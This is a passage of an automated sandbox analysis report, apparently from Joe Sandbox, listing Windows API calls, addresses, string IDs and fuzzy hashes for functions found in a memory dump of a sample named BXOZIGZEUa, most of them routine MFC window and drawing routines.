                                                              • String ID: DWMAPI$DwmSetIconicThumbnail
                                                              • API String ID: 3128169092-3761315311
                                                              • Opcode ID: 895fc8abe49795d1ce40698f1953406d35c726c9eccc683655628080383c845b
                                                              • Instruction ID: f611860f6d4c8092a26f30a3ac98b5caaaa7902e23745827a830bbc57faeeb27
                                                              • Opcode Fuzzy Hash: 895fc8abe49795d1ce40698f1953406d35c726c9eccc683655628080383c845b
                                                              • Instruction Fuzzy Hash: 93016D75600349BFDB105B668C88ABBB6ADFF48754F00412AFA11D7252DFBCD940D7A8
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004ECFBD
                                                              • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 004ECFCD
                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 004ED00C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID: CreateFileTransactedW$kernel32.dll
                                                              • API String ID: 2580138172-2053874626
                                                              • Opcode ID: 8094817bfe080e1f2872dcfef6274557377441d6980614f6bf3b17749b617e35
                                                              • Instruction ID: cfcbbe5a1140e844780f280d114bd43999934e7a3e797e52bbee26f8abd06e5b
                                                              • Opcode Fuzzy Hash: 8094817bfe080e1f2872dcfef6274557377441d6980614f6bf3b17749b617e35
                                                              • Instruction Fuzzy Hash: 7201CC3250054AFBCF220F969C04CAB7E36FB98B65B184615FA2591160C73A8862FBA5
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E191F
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004E192F
                                                                • Part of subcall function 004E18A2: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E18B6
                                                                • Part of subcall function 004E18A2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 004E18C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Advapi32.dll$RegDeleteKeyExW
                                                              • API String ID: 1646373207-2191092095
                                                              • Opcode ID: 2798b9e1c80aa177170f9d62417dd9caa78ca6653a0f5331ec5b3a29c01a0356
                                                              • Instruction ID: e5baa979b3ab41a5053daf3cdd08aff4e6d8afa5f37ef20931d7141a4039674d
                                                              • Opcode Fuzzy Hash: 2798b9e1c80aa177170f9d62417dd9caa78ca6653a0f5331ec5b3a29c01a0356
                                                              • Instruction Fuzzy Hash: 1BF0DCB9240280BFDF245F52EC48B667FA6BB14742F00042AF54AD2272CB3A9950EB59
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00528CA8
                                                              • GetWindow.USER32(?,00000005), ref: 00528D4D
                                                              • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 00528D68
                                                              • GetParent.USER32(?), ref: 00528ECC
                                                              • SendMessageW.USER32(?,00000222,00000000,00000000), ref: 005290A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$H_prolog3_ParentWindow
                                                              • String ID:
                                                              • API String ID: 3554438227-0
                                                              • Opcode ID: 2458c0ac92c192f3ca0465968f9a7607f1287687a4c0bf3faec95c6380cc3d83
                                                              • Instruction ID: a8b0b8c0df86d3aaa47e7dcee7bf1b26bac26f77588d24bfaffda25049daf05d
                                                              • Opcode Fuzzy Hash: 2458c0ac92c192f3ca0465968f9a7607f1287687a4c0bf3faec95c6380cc3d83
                                                              • Instruction Fuzzy Hash: A8D19870A01218DFCF14EBE5D899BBDBBB9BF48319F14012EE506AB2D1DB785905CB44
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$Client
                                                              • String ID:
                                                              • API String ID: 1457177775-0
                                                              • Opcode ID: 37f7600e84d90a44faec86a9ec29b46421e1188a99973c643302e26b0fea1ad6
                                                              • Instruction ID: 67a6453ab36685ec75cdcf9821150f59723e8759e0c1f5d852c39de5469b41e1
                                                              • Opcode Fuzzy Hash: 37f7600e84d90a44faec86a9ec29b46421e1188a99973c643302e26b0fea1ad6
                                                              • Instruction Fuzzy Hash: 07D1D531A0060A8FCF15CF68C5805BEB7B2BF59314F24856EEA15AF340DB79A941CB94
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0051F62A
                                                              • InflateRect.USER32(?,00000000,00000000), ref: 0051F656
                                                              • GetSystemMetrics.USER32(00000002), ref: 0051F6D3
                                                              • _memset.LIBCMT ref: 0051F6F9
                                                                • Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F
                                                                • Part of subcall function 004E6F29: GetScrollInfo.USER32(?,?,?), ref: 004E6F5D
                                                                • Part of subcall function 004E6EE9: SetScrollInfo.USER32(?,?,?,?), ref: 004E6F1A
                                                              • EnableScrollBar.USER32(?,00000002,00000000), ref: 0051F7DC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Scroll$InfoRect$ClientEnableInflateMetricsSystemWindow_memset
                                                              • String ID:
                                                              • API String ID: 4263531605-0
                                                              • Opcode ID: c477bc988aa9d29464eedb4c2f7ad5f0adeae8ff43c3cec49e14a33a91935f7b
                                                              • Instruction ID: 25edd2a4359bf99dc4bb65af8736e146901bec2fd5a5f639a8b841be43970200
                                                              • Opcode Fuzzy Hash: c477bc988aa9d29464eedb4c2f7ad5f0adeae8ff43c3cec49e14a33a91935f7b
                                                              • Instruction Fuzzy Hash: 54612971A01219EFEB10DFA9C984AEDBBB5FF44700F14047AE909EB296D7B45D41CB60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005B1512
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 005B1560
                                                              • GetBoundsRect.GDI32(?,005B1A89,00000000,00000000), ref: 005B1588
                                                              • CreateSolidBrush.GDI32 ref: 005B15A2
                                                              • FillRect.USER32(00000000,005B1A89,?), ref: 005B15BB
                                                                • Part of subcall function 005B08C5: FrameRgn.GDI32(00000000,?,00000000,005B1A89,0000003C), ref: 005B08ED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CreateRect$BoundsBrushCompatibleFillFrameH_prolog3_Solid
                                                              • String ID:
                                                              • API String ID: 2864772683-0
                                                              • Opcode ID: 121e486b145b98efe3b96a16609e688ddb5a3de5a72a4b9948fc92460dd39fb3
                                                              • Instruction ID: 7f1d8b6ddc1115e2019fb4d966c3b264be076840fa4d7e21d071e07de1b8a81f
                                                              • Opcode Fuzzy Hash: 121e486b145b98efe3b96a16609e688ddb5a3de5a72a4b9948fc92460dd39fb3
                                                              • Instruction Fuzzy Hash: AE518271C10619EFCF11EF94C895AEDBBB5FF08700F18002AF801AA181C7756A85CFA5
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005232DB
                                                              • RedrawWindow.USER32(?,?,?,00000541), ref: 005234A1
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetSystemMenu.USER32(?,00000000), ref: 00523315
                                                              • IsMenu.USER32(?), ref: 00523334
                                                              • IsMenu.USER32(?), ref: 00523342
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$H_prolog3LongRedrawSystem
                                                              • String ID:
                                                              • API String ID: 1445310841-0
                                                              • Opcode ID: dd1849e9d91969dcbc722b4c37b83df1577b55fa4361afcdec3b6bc44708afb5
                                                              • Instruction ID: 2e1df8c0c1672411939f4677d352070db563f86f25a683701e762a5dfd06ccfb
                                                              • Opcode Fuzzy Hash: dd1849e9d91969dcbc722b4c37b83df1577b55fa4361afcdec3b6bc44708afb5
                                                              • Instruction Fuzzy Hash: 6251BF31A002168BDF04EFB5D85ABAE7BB1BF55310F144569E915EB2D1DF38AE00CBA0
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00550E7C
                                                              • GetCursorPos.USER32(?), ref: 00550E96
                                                              • ScreenToClient.USER32(?,?), ref: 00550EA6
                                                              • GetClientRect.USER32(?,?), ref: 00550ED1
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A
                                                              • SetRect.USER32(?,?,?,?,?), ref: 00550F88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Client$RectScreen$CursorWindow
                                                              • String ID:
                                                              • API String ID: 3730894386-0
                                                              • Opcode ID: b85970f2e5ed998622fe3c193579bca08f29e9ea1de90c1f1932c85863c1b55e
                                                              • Instruction ID: 55a5f0ddb8ceead862db6ad41fd02a150fb3b297147fc76f76642aa54a4625cf
                                                              • Opcode Fuzzy Hash: b85970f2e5ed998622fe3c193579bca08f29e9ea1de90c1f1932c85863c1b55e
                                                              • Instruction Fuzzy Hash: B351E7B1E00209EFCB14DFA9C9949EEFBB9FF88315F10451AE905A7251DB34A945CF60
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 005112B5
                                                              • ShowWindow.USER32(00000000,00000004), ref: 005112E7
                                                              • IsWindow.USER32(?), ref: 0051132C
                                                              • IsWindowVisible.USER32(?), ref: 00511337
                                                              • ShowWindow.USER32(?,00000000), ref: 00511372
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Visible
                                                              • String ID:
                                                              • API String ID: 2757229004-0
                                                              • Opcode ID: e20d742d9f9f19f4747a5e658b038a5c380ebdd120615be7076305d61b250d2c
                                                              • Instruction ID: 8f74c96e61179c58ed2eaf2686888e681f74431b6d1bf1d1492beac89f3e6787
                                                              • Opcode Fuzzy Hash: e20d742d9f9f19f4747a5e658b038a5c380ebdd120615be7076305d61b250d2c
                                                              • Instruction Fuzzy Hash: 96411731600705ABEB109F61C844FFB3FA8BF44750F1544AAFA16DB685DB34E880C7A9
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0051EE10
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A
                                                              • PtInRect.USER32(?,?,?), ref: 0051EE2A
                                                              • PtInRect.USER32(?,?,?), ref: 0051EE9D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientRect$Screen
                                                              • String ID:
                                                              • API String ID: 3187875807-0
                                                              • Opcode ID: 50cbf08e8e77ee73e231714b73a8d4aed1c785dded9d79aed6df69cdd35ebcf7
                                                              • Instruction ID: 35dbc17ab40eee68968918b58d96292c98a5904a5034e479575e8df547881315
                                                              • Opcode Fuzzy Hash: 50cbf08e8e77ee73e231714b73a8d4aed1c785dded9d79aed6df69cdd35ebcf7
                                                              • Instruction Fuzzy Hash: EB41EF71A0150AEFDF11DFA4C985AEEBFF9FF09300F104959E806EB240D671A985DB51
                                                              APIs
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetWindowRect.USER32(?,0051CC3A), ref: 0055F697
                                                              • GetSystemMetrics.USER32(00000021), ref: 0055F6A5
                                                              • GetSystemMetrics.USER32(00000020), ref: 0055F6AB
                                                              • GetKeyState.USER32(00000002), ref: 0055F6CB
                                                              • InflateRect.USER32(0051CC3A,00000000,00000000), ref: 0055F701
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsRectSystemWindow$InflateLongState
                                                              • String ID:
                                                              • API String ID: 2406722796-0
                                                              • Opcode ID: 46665f2ac249bcc0d51cc8f1906dbc84f68db5e25624b4028e48db3e3fe21f01
                                                              • Instruction ID: a90e89128fbdc3fc839967aba216ac4ca0c1146f73f1c20b99b785e531f4f8b2
                                                              • Opcode Fuzzy Hash: 46665f2ac249bcc0d51cc8f1906dbc84f68db5e25624b4028e48db3e3fe21f01
                                                              • Instruction Fuzzy Hash: E631B431A102199BCF10DFB8D899ABF7FB5FB49392F54482BD802E7150DB749948CB50
                                                              APIs
                                                                • Part of subcall function 0053399B: SetRectEmpty.USER32(?), ref: 005339B6
                                                              • IsRectEmpty.USER32(?), ref: 0053C7EE
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                              • GetWindowRect.USER32(?,?), ref: 0053C82F
                                                              • UnionRect.USER32(?,?,?), ref: 0053C858
                                                              • EqualRect.USER32(?,?), ref: 0053C866
                                                              • OffsetRect.USER32(?,?,?), ref: 0053C882
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientEmptyScreen$EqualOffsetUnionWindow
                                                              • String ID:
                                                              • API String ID: 2676815302-0
                                                              • Opcode ID: aa120013f7be0ac41011bb8c282d780950edcdb0be92cabf33942af82b96c0ae
                                                              • Instruction ID: 5a34a1dddc513d5c04e5168af84ca94cf03ed730b0b3ac4bd3d69e582c97832d
                                                              • Opcode Fuzzy Hash: aa120013f7be0ac41011bb8c282d780950edcdb0be92cabf33942af82b96c0ae
                                                              • Instruction Fuzzy Hash: 8641A9B2A00209AF8B00DFE9D9849EEFBF9FF58300B50456AE505F3251DB75AA05CB60
                                                              APIs
                                                              • SendMessageW.USER32(?,00001014,?,00000000), ref: 00536F88
                                                              • SendMessageW.USER32(?,00000114,?,00000000), ref: 00536F98
                                                              • SetScrollPos.USER32(?,00000002,00000000,00000001), ref: 00536FB6
                                                              • GetParent.USER32(?), ref: 00536FC6
                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00536FDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ParentScroll
                                                              • String ID:
                                                              • API String ID: 375824706-0
                                                              • Opcode ID: 374426945f4f59b796da7e4ebce692c3cb69ab31d4ec0e6e35760eb716d52d38
                                                              • Instruction ID: 17d31346ebdb2a538de6d89b4b7e61a8d5bc339c83937d9787c8360968388adf
                                                              • Opcode Fuzzy Hash: 374426945f4f59b796da7e4ebce692c3cb69ab31d4ec0e6e35760eb716d52d38
                                                              • Instruction Fuzzy Hash: 9831F071200246BFDB209F25DC84FAA3FA6FB45305F10C52DF65A8B2A1CB71D894DB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientCursorScreen$Rect
                                                              • String ID:
                                                              • API String ID: 1082406499-0
                                                              • Opcode ID: 7cd878dc6565fc5c2ec5d3f6c842f6a62f38f5a2efaad4541a0fbde3ca15b00b
                                                              • Instruction ID: 5ac78a3fd72678b629b283d4ec52286a30288c1d60a2c71eeee4e4ecfcc60b11
                                                              • Opcode Fuzzy Hash: 7cd878dc6565fc5c2ec5d3f6c842f6a62f38f5a2efaad4541a0fbde3ca15b00b
                                                              • Instruction Fuzzy Hash: 41312C75A0060DDFCB10EFA5D884ABEBBF9FB49304B10442EEA16E2251DB39AD45CB54
                                                              APIs
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00500B4D
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00500B7C
                                                              • InflateRect.USER32(?,?,?), ref: 00500BDE
                                                              • InflateRect.USER32(?,00000001,00000001), ref: 00500BFA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
